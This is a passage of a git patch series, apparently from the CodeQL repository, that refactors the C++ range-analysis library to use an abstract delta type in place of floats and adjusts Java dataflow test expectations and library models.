a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/FloatDelta.qll b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/FloatDelta.qll index 7011f52a1b0..52863821782 100644 --- a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/FloatDelta.qll +++ b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/FloatDelta.qll @@ -16,6 +16,5 @@ module FloatDelta implements DeltaSig { Delta fromInt(int n) { result = n } bindingset[f] - bindingset[result] - Delta fromFloat(float f) { result = f } + Delta fromFloat(float f) { result = min(float diff, float res | diff = (res - f).abs() and res = f.ceil() or diff = (f - res).abs() and res = f.floor() | res order by diff )} } diff --git a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisSpecific.qll b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisSpecific.qll index 34d5bca116b..1450ea7b528 100644 --- a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisSpecific.qll +++ b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisSpecific.qll @@ -5,6 +5,7 @@ private import experimental.semmle.code.cpp.semantic.Semantic private import RangeAnalysisStage private import experimental.semmle.code.cpp.semantic.analysis.FloatDelta +private import experimental.semmle.code.cpp.semantic.analysis.IntDelta module CppLangImpl implements LangSig { /** diff --git a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisStage.qll b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisStage.qll index 2cf224ac785..e782a0bbda5 100644 --- a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisStage.qll +++ b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisStage.qll @@ -110,7 +110,7 @@ signature module DeltaSig { Delta fromInt(int n); bindingset[f] - bindingset[result] + //bindingset[result] Delta fromFloat(float f); } @@ -268,7 +268,7 @@ module RangeStage Bounds, LangSig LangParam, UtilSig< private class SafeCastExpr extends ConvertOrBoxExpr { SafeCastExpr() { conversionCannotOverflow(getTrackedType(pragma[only_bind_into](getOperand())), - pragma[only_bind_out](getTrackedType(this))) + pragma[only_bind_out](getTrackedType(this))) } } @@ -310,7 +310,7 @@ module RangeStage Bounds, LangSig LangParam, UtilSig< * condition. */ cached - predicate semBounded(SemExpr e, SemBound b, float delta, boolean upper, SemReason reason) { + predicate semBounded(SemExpr e, SemBound b, D::Delta delta, boolean upper, SemReason reason) { bounded(e, b, delta, upper, _, _, reason) and bestBound(e, b, delta, upper) } @@ -333,11 +333,11 @@ module RangeStage Bounds, LangSig LangParam, UtilSig< * - `upper = true` : `e <= b + delta` * - `upper = false` : `e >= b + delta` */ - private predicate bestBound(SemExpr e, SemBound b, float delta, boolean upper) { - delta = min(float d | bounded(e, b, d, upper, _, _, _)) and + private predicate bestBound(SemExpr e, SemBound b, D::Delta delta, boolean upper) { + delta = min(D::Delta d | bounded(e, b, d, upper, _, _, _) | d order by D::toFloat(d)) and upper = true or - delta = max(float d | bounded(e, b, d, upper, _, _, _)) and + delta = max(D::Delta d | bounded(e, b, d, upper, _, _, _) | d order by D::toFloat(d)) and upper = false } @@ -347,48 +347,48 @@ module RangeStage Bounds, LangSig LangParam, UtilSig< * - `upper = false` : `v >= e + delta` or `v > e + delta` */ private predicate boundCondition( - SemRelationalExpr comp, SemSsaVariable v, SemExpr e, float delta, boolean upper + SemRelationalExpr comp, SemSsaVariable v, SemExpr e, D::Delta delta, boolean upper ) { - comp.getLesserOperand() = semSsaRead(v, fromFloat(delta)) and + comp.getLesserOperand() = semSsaRead(v, delta) and e = comp.getGreaterOperand() and upper = true or - comp.getGreaterOperand() = semSsaRead(v, fromFloat(delta)) and + comp.getGreaterOperand() = semSsaRead(v, delta) and e = comp.getLesserOperand() and upper = false or - exists(SemSubExpr sub, SemConstantIntegerExpr c, float d | + exists(SemSubExpr sub, SemConstantIntegerExpr c, D::Delta d | // (v - d) - e < c comp.getLesserOperand() = sub and comp.getGreaterOperand() = c and - sub.getLeftOperand() = semSsaRead(v, fromFloat(d)) and + sub.getLeftOperand() = semSsaRead(v, d) and sub.getRightOperand() = e and upper = true and - delta = d + c.getIntValue() + delta = D::fromFloat(D::toFloat(d) + c.getIntValue()) or // (v - d) - e > c comp.getGreaterOperand() = sub and comp.getLesserOperand() = c and - sub.getLeftOperand() = semSsaRead(v, fromFloat(d)) and + sub.getLeftOperand() = semSsaRead(v, d) and sub.getRightOperand() = e and upper = false and - delta = d + c.getIntValue() + delta = D::fromFloat(D::toFloat(d) + c.getIntValue()) or // e - (v - d) < c comp.getLesserOperand() = sub and comp.getGreaterOperand() = c and sub.getLeftOperand() = e and - sub.getRightOperand() = semSsaRead(v, fromFloat(d)) and + sub.getRightOperand() = semSsaRead(v, d) and upper = false and - delta = d - c.getIntValue() + delta = D::fromFloat(D::toFloat(d) - c.getIntValue()) or // e - (v - d) > c comp.getGreaterOperand() = sub and comp.getLesserOperand() = c and sub.getLeftOperand() = e and - sub.getRightOperand() = semSsaRead(v, fromFloat(d)) and + sub.getRightOperand() = semSsaRead(v, d) and upper = true and - delta = d - c.getIntValue() + delta = D::fromFloat(D::toFloat(d) - c.getIntValue()) ) } @@ -439,10 +439,10 @@ module RangeStage Bounds, LangSig LangParam, UtilSig< * - `upper = false` : `v >= e + delta` */ private SemGuard boundFlowCond( - SemSsaVariable v, SemExpr e, float delta, boolean upper, boolean testIsTrue + SemSsaVariable v, SemExpr e, D::Delta delta, boolean upper, boolean testIsTrue ) { exists( - SemRelationalExpr comp, float d1, float d2, float d3, int strengthen, boolean compIsUpper, + SemRelationalExpr comp, D::Delta d1, float d2, float d3, int strengthen, boolean compIsUpper, boolean resultIsStrict | comp = result.asExpr() and @@ -475,26 +475,27 @@ module RangeStage Bounds, LangSig LangParam, UtilSig< or resultIsStrict = false and d3 = 0 ) and - delta = d1 + d2 + d3 + delta = D::fromFloat(D::toFloat(d1) + d2 + d3) ) or exists(boolean testIsTrue0 | semImplies_v2(result, testIsTrue, boundFlowCond(v, e, delta, upper, testIsTrue0), testIsTrue0) ) or - result = semEqFlowCond(v, e, fromFloat(delta), true, testIsTrue) and + result = semEqFlowCond(v, e, delta, true, testIsTrue) and (upper = true or upper = false) or // guard that tests whether `v2` is bounded by `e + delta + d1 - d2` and // exists a guard `guardEq` such that `v = v2 - d1 + d2`. exists( - SemSsaVariable v2, SemGuard guardEq, boolean eqIsTrue, float d1, float d2, float oldDelta + SemSsaVariable v2, SemGuard guardEq, boolean eqIsTrue, D::Delta d1, D::Delta d2, + D::Delta oldDelta | - guardEq = semEqFlowCond(v, semSsaRead(v2, fromFloat(d1)), fromFloat(d2), true, eqIsTrue) and + guardEq = semEqFlowCond(v, semSsaRead(v2, d1), d2, true, eqIsTrue) and result = boundFlowCond(v2, e, oldDelta, upper, testIsTrue) and // guardEq needs to control guard guardEq.directlyControls(result.getBasicBlock(), eqIsTrue) and - delta = oldDelta - d1 + d2 + delta = D::fromFloat(D::toFloat(oldDelta) - D::toFloat(d1) + D::toFloat(d2)) ) } @@ -534,10 +535,10 @@ module RangeStage Bounds, LangSig LangParam, UtilSig< * - `upper = false` : `v >= e + delta` */ private predicate boundFlowStepSsa( - SemSsaVariable v, SemSsaReadPosition pos, SemExpr e, float delta, boolean upper, + SemSsaVariable v, SemSsaReadPosition pos, SemExpr e, D::Delta delta, boolean upper, SemReason reason ) { - semSsaUpdateStep(v, e, fromFloat(delta)) and + semSsaUpdateStep(v, e, delta) and pos.hasReadOfVar(v) and (upper = true or upper = false) and reason = TSemNoReason() @@ -552,12 +553,12 @@ module RangeStage Bounds, LangSig LangParam, UtilSig< /** Holds if `v != e + delta` at `pos` and `v` is of integral type. */ private predicate unequalFlowStepIntegralSsa( - SemSsaVariable v, SemSsaReadPosition pos, SemExpr e, float delta, SemReason reason + SemSsaVariable v, SemSsaReadPosition pos, SemExpr e, D::Delta delta, SemReason reason ) { getTrackedTypeForSsaVariable(v) instanceof SemIntegerType and exists(SemGuard guard, boolean testIsTrue | pos.hasReadOfVar(v) and - guard = semEqFlowCond(v, e, fromFloat(delta), false, testIsTrue) and + guard = semEqFlowCond(v, e, delta, false, testIsTrue) and semGuardDirectlyControlsSsaRead(guard, pos, testIsTrue) and reason = TSemCondReason(guard) ) @@ -578,12 +579,12 @@ module RangeStage Bounds, LangSig LangParam, UtilSig< * - `upper = true` : `e2 <= e1 + delta` * - `upper = false` : `e2 >= e1 + delta` */ - private predicate boundFlowStep(SemExpr e2, SemExpr e1, float delta, boolean upper) { - semValueFlowStep(e2, e1, fromFloat(delta)) and + private predicate boundFlowStep(SemExpr e2, SemExpr e1, D::Delta delta, boolean upper) { + semValueFlowStep(e2, e1, delta) and (upper = true or upper = false) or e2.(SafeCastExpr).getOperand() = e1 and - delta = 0 and + delta = D::fromInt(0) and (upper = true or upper = false) or exists(SemExpr x | e2.(SemAddExpr).hasOperands(e1, x) | @@ -591,16 +592,16 @@ module RangeStage Bounds, LangSig LangParam, UtilSig< not x instanceof SemConstantIntegerExpr and not e1 instanceof SemConstantIntegerExpr and if strictlyPositiveIntegralExpr(x) - then upper = false and delta = 1 + then upper = false and delta = D::fromInt(1) else if semPositive(x) - then upper = false and delta = 0 + then upper = false and delta = D::fromInt(0) else if strictlyNegativeIntegralExpr(x) - then upper = true and delta = -1 + then upper = true and delta = D::fromInt(-1) else if semNegative(x) - then upper = true and delta = 0 + then upper = true and delta = D::fromInt(0) else none() ) or @@ -612,46 +613,52 @@ module RangeStage Bounds, LangSig LangParam, UtilSig< // `x instanceof ConstantIntegerExpr` is covered by valueFlowStep not x instanceof SemConstantIntegerExpr and if strictlyPositiveIntegralExpr(x) - then upper = true and delta = -1 + then upper = true and delta = D::fromInt(-1) else if semPositive(x) - then upper = true and delta = 0 + then upper = true and delta = D::fromInt(0) else if strictlyNegativeIntegralExpr(x) - then upper = false and delta = 1 + then upper = false and delta = D::fromInt(1) else if semNegative(x) - then upper = false and delta = 0 + then upper = false and delta = D::fromInt(0) else none() ) or e2.(SemRemExpr).getRightOperand() = e1 and semPositive(e1) and - delta = -1 and + delta = D::fromInt(-1) and upper = true or - e2.(SemRemExpr).getLeftOperand() = e1 and semPositive(e1) and delta = 0 and upper = true + e2.(SemRemExpr).getLeftOperand() = e1 and + semPositive(e1) and + delta = D::fromInt(0) and + upper = true or e2.(SemBitAndExpr).getAnOperand() = e1 and semPositive(e1) and - delta = 0 and + delta = D::fromInt(0) and upper = true or e2.(SemBitOrExpr).getAnOperand() = e1 and semPositive(e2) and - delta = 0 and + delta = D::fromInt(0) and upper = false or - hasBound(e2, e1, fromFloat(delta), upper) + hasBound(e2, e1, delta, upper) } /** Holds if `e2 = e1 * factor` and `factor > 0`. */ - private predicate boundFlowStepMul(SemExpr e2, SemExpr e1, float factor) { + private predicate boundFlowStepMul(SemExpr e2, SemExpr e1, D::Delta factor) { exists(SemConstantIntegerExpr c, int k | k = c.getIntValue() and k > 0 | - e2.(SemMulExpr).hasOperands(e1, c) and factor = k + e2.(SemMulExpr).hasOperands(e1, c) and factor = D::fromInt(k) or exists(SemShiftLeftExpr e | - e = e2 and e.getLeftOperand() = e1 and e.getRightOperand() = c and factor = 2.pow(k) + e = e2 and + e.getLeftOperand() = e1 and + e.getRightOperand() = c and + factor = D::fromInt(2.pow(k)) ) ) } @@ -662,18 +669,26 @@ module RangeStage Bounds, LangSig LangParam, UtilSig< * This conflates division, right shift, and unsigned right shift and is * therefore only valid for non-negative numbers. */ - private predicate boundFlowStepDiv(SemExpr e2, SemExpr e1, float factor) { - exists(SemConstantIntegerExpr c, float k | k = c.getIntValue() and k > 0 | + private predicate boundFlowStepDiv(SemExpr e2, SemExpr e1, D::Delta factor) { + exists(SemConstantIntegerExpr c, D::Delta k | + k = D::fromInt(c.getIntValue()) and D::toFloat(k) > 0 + | exists(SemDivExpr e | e = e2 and e.getLeftOperand() = e1 and e.getRightOperand() = c and factor = k ) or exists(SemShiftRightExpr e | - e = e2 and e.getLeftOperand() = e1 and e.getRightOperand() = c and factor = 2.pow(k) + e = e2 and + e.getLeftOperand() = e1 and + e.getRightOperand() = c and + factor = D::fromInt(2.pow(D::toInt(k))) ) or exists(SemShiftRightUnsignedExpr e | - e = e2 and e.getLeftOperand() = e1 and e.getRightOperand() = c and factor = 2.pow(k) + e = e2 and + e.getLeftOperand() = e1 and + e.getRightOperand() = c and + factor = D::fromInt(2.pow(D::toInt(k))) ) ) } @@ -684,27 +699,27 @@ module RangeStage Bounds, LangSig LangParam, UtilSig< * - `upper = false` : `v >= b + delta` */ private predicate boundedSsa( - SemSsaVariable v, SemSsaReadPosition pos, SemBound b, float delta, boolean upper, - boolean fromBackEdge, float origdelta, SemReason reason + SemSsaVariable v, SemSsaReadPosition pos, SemBound b, D::Delta delta, boolean upper, + boolean fromBackEdge, D::Delta origdelta, SemReason reason ) { - exists(SemExpr mid, float d1, float d2, SemReason r1, SemReason r2 | + exists(SemExpr mid, D::Delta d1, D::Delta d2, SemReason r1, SemReason r2 | boundFlowStepSsa(v, pos, mid, d1, upper, r1) and bounded(mid, b, d2, upper, fromBackEdge, origdelta, r2) and // upper = true: v <= mid + d1 <= b + d1 + d2 = b + delta // upper = false: v >= mid + d1 >= b + d1 + d2 = b + delta - delta = d1 + d2 and + delta = D::fromFloat(D::toFloat(d1) + D::toFloat(d2)) and (if r1 instanceof SemNoReason then reason = r2 else reason = r1) ) or - exists(float d, SemReason r1, SemReason r2 | + exists(D::Delta d, SemReason r1, SemReason r2 | boundedSsa(v, pos, b, d, upper, fromBackEdge, origdelta, r2) or boundedPhi(v, b, d, upper, fromBackEdge, origdelta, r2) | unequalIntegralSsa(v, pos, b, d, r1) and ( - upper = true and delta = d - 1 + upper = true and delta = D::fromFloat(D::toFloat(d) - 1) or - upper = false and delta = d + 1 + upper = false and delta = D::fromFloat(D::toFloat(d) + 1) ) and ( reason = r1 @@ -718,13 +733,13 @@ module RangeStage Bounds, LangSig LangParam, UtilSig< * Holds if `v != b + delta` at `pos` and `v` is of integral type. */ private predicate unequalIntegralSsa( - SemSsaVariable v, SemSsaReadPosition pos, SemBound b, float delta, SemReason reason + SemSsaVariable v, SemSsaReadPosition pos, SemBound b, D::Delta delta, SemReason reason ) { - exists(SemExpr e, float d1, float d2 | + exists(SemExpr e, D::Delta d1, D::Delta d2 | unequalFlowStepIntegralSsa(v, pos, e, d1, reason) and boundedUpper(e, b, d1) and boundedLower(e, b, d2) and - delta = d2 + d1 + delta = D::fromFloat(D::toFloat(d1) + D::toFloat(d2)) ) } @@ -734,7 +749,7 @@ module RangeStage Bounds, LangSig LangParam, UtilSig< * This predicate only exists to prevent a bad standard order in `unequalIntegralSsa`. */ pragma[nomagic] - private predicate boundedUpper(SemExpr e, SemBound b, float delta) { + private predicate boundedUpper(SemExpr e, SemBound b, D::Delta delta) { bounded(e, b, delta, true, _, _, _) } @@ -744,18 +759,18 @@ module RangeStage Bounds, LangSig LangParam, UtilSig< * This predicate only exists to prevent a bad standard order in `unequalIntegralSsa`. */ pragma[nomagic] - private predicate boundedLower(SemExpr e, SemBound b, float delta) { + private predicate boundedLower(SemExpr e, SemBound b, D::Delta delta) { bounded(e, b, delta, false, _, _, _) } /** Weakens a delta to lie in the range `[-1..1]`. */ bindingset[delta, upper] - private float weakenDelta(boolean upper, float delta) { - delta in [-1 .. 1] and result = delta + private D::Delta weakenDelta(boolean upper, D::Delta delta) { + delta = D::fromFloat([-1 .. 1]) and result = delta or - upper = true and result = -1 and delta < -1 + upper = true and result = D::fromFloat(-1) and D::toFloat(delta) < -1 or - upper = false and result = 1 and delta > 1 + upper = false and result = D::fromFloat(1) and D::toFloat(delta) > 1 } /** @@ -766,26 +781,29 @@ module RangeStage Bounds, LangSig LangParam, UtilSig< */ private predicate boundedPhiInp( SemSsaPhiNode phi, SemSsaVariable inp, SemSsaReadPositionPhiInputEdge edge, SemBound b, - float delta, boolean upper, boolean fromBackEdge, float origdelta, SemReason reason + D::Delta delta, boolean upper, boolean fromBackEdge, D::Delta origdelta, SemReason reason ) { edge.phiInput(phi, inp) and - exists(float d, boolean fromBackEdge0 | + exists(D::Delta d, boolean fromBackEdge0 | boundedSsa(inp, edge, b, d, upper, fromBackEdge0, origdelta, reason) or boundedPhi(inp, b, d, upper, fromBackEdge0, origdelta, reason) or b.(SemSsaBound).getAVariable() = inp and - d = 0 and + d = D::fromFloat(0) and (upper = true or upper = false) and fromBackEdge0 = false and - origdelta = 0 and + origdelta = D::fromFloat(0) and reason = TSemNoReason() | if semBackEdge(phi, inp, edge) then fromBackEdge = true and ( - fromBackEdge0 = true and delta = weakenDelta(upper, d - origdelta) + origdelta + fromBackEdge0 = true and + delta = + D::fromFloat(D::toFloat(weakenDelta(upper, + D::fromFloat(D::toFloat(d) - D::toFloat(origdelta)))) + D::toFloat(origdelta)) or fromBackEdge0 = false and delta = d ) @@ -806,7 +824,7 @@ module RangeStage Bounds, LangSig LangParam, UtilSig< pragma[noinline] private predicate boundedPhiInp1( SemSsaPhiNode phi, SemBound b, boolean upper, SemSsaVariable inp, - SemSsaReadPositionPhiInputEdge edge, float delta + SemSsaReadPositionPhiInputEdge edge, D::Delta delta ) { boundedPhiInp(phi, inp, edge, b, delta, upper, _, _, _) } @@ -820,13 +838,13 @@ module RangeStage Bounds, LangSig LangParam, UtilSig< private predicate selfBoundedPhiInp( SemSsaPhiNode phi, SemSsaVariable inp, SemSsaReadPositionPhiInputEdge edge, boolean upper ) { - exists(float d, SemSsaBound phibound | + exists(D::Delta d, SemSsaBound phibound | phibound.getAVariable() = phi and boundedPhiInp(phi, inp, edge, phibound, d, upper, _, _, _) and ( - upper = true and d <= 0 + upper = true and D::toFloat(d) <= 0 or - upper = false and d >= 0 + upper = false and D::toFloat(d) >= 0 ) ) } @@ -839,8 +857,8 @@ module RangeStage Bounds, LangSig LangParam, UtilSig< */ pragma[noinline] private predicate boundedPhiCand( - SemSsaPhiNode phi, boolean upper, SemBound b, float delta, boolean fromBackEdge, - float origdelta, SemReason reason + SemSsaPhiNode phi, boolean upper, SemBound b, D::Delta delta, boolean fromBackEdge, + D::Delta origdelta, SemReason reason ) { exists(SemSsaVariable inp, SemSsaReadPositionPhiInputEdge edge | boundedPhiInp(phi, inp, edge, b, delta, upper, fromBackEdge, origdelta, reason) @@ -852,14 +870,18 @@ module RangeStage Bounds, LangSig LangParam, UtilSig< * `inp` along `edge`. */ private predicate boundedPhiCandValidForEdge( - SemSsaPhiNode phi, SemBound b, float delta, boolean upper, boolean fromBackEdge, - float origdelta, SemReason reason, SemSsaVariable inp, SemSsaReadPositionPhiInputEdge edge + SemSsaPhiNode phi, SemBound b, D::Delta delta, boolean upper, boolean fromBackEdge, + D::Delta origdelta, SemReason reason, SemSsaVariable inp, SemSsaReadPositionPhiInputEdge edge ) { boundedPhiCand(phi, upper, b, delta, fromBackEdge, origdelta, reason) and ( - exists(float d | boundedPhiInp1(phi, b, upper, inp, edge, d) | upper = true and d <= delta) + exists(D::Delta d | boundedPhiInp1(phi, b, upper, inp, edge, d) | + upper = true and D::toFloat(d) <= D::toFloat(delta) + ) or - exists(float d | boundedPhiInp1(phi, b, upper, inp, edge, d) | upper = false and d >= delta) + exists(D::Delta d | boundedPhiInp1(phi, b, upper, inp, edge, d) | + upper = false and D::toFloat(d) >= D::toFloat(delta) + ) or selfBoundedPhiInp(phi, inp, edge, upper) ) @@ -871,8 +893,8 @@ module RangeStage Bounds, LangSig LangParam, UtilSig< * - `upper = false` : `phi >= b + delta` */ private predicate boundedPhi( - SemSsaPhiNode phi, SemBound b, float delta, boolean upper, boolean fromBackEdge, - float origdelta, SemReason reason + SemSsaPhiNode phi, SemBound b, D::Delta delta, boolean upper, boolean fromBackEdge, + D::Delta origdelta, SemReason reason ) { forex(SemSsaVariable inp, SemSsaReadPositionPhiInputEdge edge | edge.phiInput(phi, inp) | boundedPhiCandValidForEdge(phi, b, delta, upper, fromBackEdge, origdelta, reason, inp, edge) @@ -883,11 +905,11 @@ module RangeStage Bounds, LangSig LangParam, UtilSig< * Holds if `e` has an upper (for `upper = true`) or lower * (for `upper = false`) bound of `b`. */ - private predicate baseBound(SemExpr e, float b, boolean upper) { - hasConstantBound(e, fromFloat(b), upper) + private predicate baseBound(SemExpr e, D::Delta b, boolean upper) { + hasConstantBound(e, b, upper) or upper = false and - b = 0 and + b = D::fromInt(0) and semPositive(e.(SemBitAndExpr).getAnOperand()) and // REVIEW: We let the language opt out here to preserve original results. not ignoreZeroLowerBound(e) @@ -900,17 +922,19 @@ module RangeStage Bounds, LangSig LangParam, UtilSig< * `upper = false` this means that the cast will not underflow. */ private predicate safeNarrowingCast(NarrowingCastExpr cast, boolean upper) { - exists(float bound | bounded(cast.getOperand(), any(SemZeroBound zb), bound, upper, _, _, _) | - upper = true and bound <= cast.getUpperBound() + exists(D::Delta bound | + bounded(cast.getOperand(), any(SemZeroBound zb), bound, upper, _, _, _) + | + upper = true and D::toFloat(bound) <= cast.getUpperBound() or - upper = false and bound >= cast.getLowerBound() + upper = false and D::toFloat(bound) >= cast.getLowerBound() ) } pragma[noinline] private predicate boundedCastExpr( - NarrowingCastExpr cast, SemBound b, float delta, boolean upper, boolean fromBackEdge, - float origdelta, SemReason reason + NarrowingCastExpr cast, SemBound b, D::Delta delta, boolean upper, boolean fromBackEdge, + D::Delta origdelta, SemReason reason ) { bounded(cast.getOperand(), b, delta, upper, fromBackEdge, origdelta, reason) } @@ -921,12 +945,12 @@ module RangeStage Bounds, LangSig LangParam, UtilSig< * - `upper = false` : `e >= b + delta` */ private predicate bounded( - SemExpr e, SemBound b, float delta, boolean upper, boolean fromBackEdge, float origdelta, + SemExpr e, SemBound b, D::Delta delta, boolean upper, boolean fromBackEdge, D::Delta origdelta, SemReason reason ) { not ignoreExprBound(e) and ( - e = b.getExpr(fromFloat(delta)) and + e = b.getExpr(delta) and (upper = true or upper = false) and fromBackEdge = false and origdelta = delta and @@ -944,14 +968,14 @@ module RangeStage Bounds, LangSig LangParam, UtilSig< bb.getBlock() = e.getBasicBlock() ) or - exists(SemExpr mid, float d1, float d2 | + exists(SemExpr mid, D::Delta d1, D::Delta d2 | boundFlowStep(e, mid, d1, upper) and // Constants have easy, base-case bounds, so let's not infer any recursive bounds. not e instanceof SemConstantIntegerExpr and bounded(mid, b, d2, upper, fromBackEdge, origdelta, reason) and // upper = true: e <= mid + d1 <= b + d1 + d2 = b + delta // upper = false: e >= mid + d1 >= b + d1 + d2 = b + delta - delta = d1 + d2 + delta = D::fromFloat(D::toFloat(d1) + D::toFloat(d2)) ) or exists(SemSsaPhiNode phi | @@ -959,21 +983,21 @@ module RangeStage Bounds, LangSig LangParam, UtilSig< e = phi.getAUse() ) or - exists(SemExpr mid, float factor, float d | + exists(SemExpr mid, D::Delta factor, D::Delta d | boundFlowStepMul(e, mid, factor) and not e instanceof SemConstantIntegerExpr and bounded(mid, b, d, upper, fromBackEdge, origdelta, reason) and b instanceof SemZeroBound and - delta = d * factor + delta = D::fromFloat(D::toFloat(d) * D::toFloat(factor)) ) or - exists(SemExpr mid, float factor, float d | + exists(SemExpr mid, D::Delta factor, D::Delta d | boundFlowStepDiv(e, mid, factor) and not e instanceof SemConstantIntegerExpr and bounded(mid, b, d, upper, fromBackEdge, origdelta, reason) and b instanceof SemZeroBound and - d >= 0 and - delta = d / factor + D::toFloat(d) >= 0 and + delta = D::fromFloat(D::toFloat(d) / D::toFloat(factor)) ) or exists(NarrowingCastExpr cast | @@ -983,8 +1007,8 @@ module RangeStage Bounds, LangSig LangParam, UtilSig< ) or exists( - SemConditionalExpr cond, float d1, float d2, boolean fbe1, boolean fbe2, float od1, - float od2, SemReason r1, SemReason r2 + SemConditionalExpr cond, D::Delta d1, D::Delta d2, boolean fbe1, boolean fbe2, D::Delta od1, + D::Delta od2, SemReason r1, SemReason r2 | cond = e and boundedConditionalExpr(cond, b, upper, true, d1, fbe1, od1, r1) and @@ -995,16 +1019,16 @@ module RangeStage Bounds, LangSig LangParam, UtilSig< delta = d2 and fromBackEdge = fbe2 and origdelta = od2 and reason = r2 ) | - upper = true and delta = d1.maximum(d2) + upper = true and delta = D::fromFloat(D::toFloat(d1).maximum(D::toFloat(d2))) or - upper = false and delta = d1.minimum(d2) + upper = false and delta = D::fromFloat(D::toFloat(d1).minimum(D::toFloat(d2))) ) ) } private predicate boundedConditionalExpr( - SemConditionalExpr cond, SemBound b, boolean upper, boolean branch, float delta, - boolean fromBackEdge, float origdelta, SemReason reason + SemConditionalExpr cond, SemBound b, boolean upper, boolean branch, D::Delta delta, + boolean fromBackEdge, D::Delta origdelta, SemReason reason ) { bounded(cond.getBranchExpr(branch), b, delta, upper, fromBackEdge, origdelta, reason) } diff --git a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeUtils.qll b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeUtils.qll index a2d10cdab30..d9cc2cc9a71 100644 --- a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeUtils.qll +++ b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeUtils.qll @@ -22,11 +22,11 @@ module RangeUtil Lang> implements Range::Ut not Lang::ignoreSsaReadArithmeticExpr(result) ) or - exists(SemSubExpr sub, float d1, SemConstantIntegerExpr c | + exists(SemSubExpr sub, D::Delta d1, SemConstantIntegerExpr c | result = sub and - sub.getLeftOperand() = semSsaRead(v, D::fromFloat(d1)) and + sub.getLeftOperand() = semSsaRead(v, d1) and sub.getRightOperand() = c and - delta = D::fromFloat(d1 + c.getIntValue()) and + delta = D::fromFloat(D::toFloat(d1) + c.getIntValue()) and not Lang::ignoreSsaReadArithmeticExpr(result) ) or From 337a747bde40668a1b7e0148ba54ff078e757828 Mon Sep 17 00:00:00 2001 From: Robert Marsh Date: Thu, 12 Jan 2023 16:37:08 -0500 Subject: [PATCH 259/381] C++: cleanup some unneeded code --- .../semmle/code/cpp/semantic/analysis/FloatDelta.qll | 11 ++++++++++- .../code/cpp/semantic/analysis/RangeAnalysisStage.qll | 1 - 2 files changed, 10 insertions(+), 2 deletions(-) diff --git a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/FloatDelta.qll b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/FloatDelta.qll index 52863821782..b55eec5e5ad 100644 --- a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/FloatDelta.qll +++ b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/FloatDelta.qll @@ -16,5 +16,14 @@ module FloatDelta implements DeltaSig { Delta fromInt(int n) { result = n } bindingset[f] - Delta fromFloat(float f) { result = min(float diff, float res | diff = (res - f).abs() and res = f.ceil() or diff = (f - res).abs() and res = f.floor() | res order by diff )} + Delta fromFloat(float f) { + result = + min(float diff, float res | + diff = (res - f) and res = f.ceil() + or + diff = (f - res) and res = f.floor() + | + res order by diff + ) + } } diff --git a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisStage.qll b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisStage.qll index e782a0bbda5..f225292d5ce 100644 --- a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisStage.qll +++ b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisStage.qll @@ -110,7 +110,6 @@ signature module DeltaSig { Delta fromInt(int n); bindingset[f] - //bindingset[result] Delta fromFloat(float f); } From f040ff2d8dbf2daa9af1212e12a61e99161e9af1 Mon Sep 17 00:00:00 2001 From: Jami Cogswell Date: Thu, 12 Jan 2023 17:01:58 -0500 Subject: [PATCH 260/381] Java: undo change to Function.apply test case --- java/ql/test/library-tests/dataflow/lambda/flow.expected | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/java/ql/test/library-tests/dataflow/lambda/flow.expected b/java/ql/test/library-tests/dataflow/lambda/flow.expected index 3d3a73136ee..3b467de204b 100644 --- a/java/ql/test/library-tests/dataflow/lambda/flow.expected +++ b/java/ql/test/library-tests/dataflow/lambda/flow.expected @@ -1,5 +1,8 @@ | Executor.java:11:15:11:22 | source(...) | Executor.java:50:39:50:45 | command | +| Executor.java:11:15:11:22 | source(...) | StringProcessor.java:23:39:23:45 | command | | Executor.java:12:15:12:22 | source(...) | Executor.java:50:39:50:45 | command | +| Executor.java:12:15:12:22 | source(...) | StringProcessor.java:23:39:23:45 | command | | Executor.java:13:15:13:22 | source(...) | Executor.java:50:39:50:45 | command | -| Executor.java:14:15:14:22 | source(...) | Executor.java:58:39:58:45 | command | +| Executor.java:13:15:13:22 | source(...) | StringProcessor.java:23:39:23:45 | command | | Executor.java:15:15:15:22 | source(...) | Executor.java:58:39:58:45 | command | +| StringProcessor.java:8:26:8:29 | args | StringProcessor.java:23:39:23:45 | command | From a43f3cf95f1d030323a9a5b1e7f3f9b44a65d729 Mon Sep 17 00:00:00 2001 From: Jami Cogswell Date: Thu, 12 Jan 2023 17:09:13 -0500 Subject: [PATCH 261/381] Java: remove Supplier.get model --- java/ql/lib/ext/java.util.function.model.yml | 6 ------ java/ql/test/ext/TestModels/Test.java | 4 ---- java/ql/test/ext/TopJdkApis/TopJdkApis.qll | 1 + java/ql/test/ext/TopJdkApis/TopJdkApisTest.expected | 1 + 4 files changed, 2 insertions(+), 10 deletions(-) diff --git a/java/ql/lib/ext/java.util.function.model.yml b/java/ql/lib/ext/java.util.function.model.yml index 41d0f1f77df..9a608462a92 100644 --- a/java/ql/lib/ext/java.util.function.model.yml +++ 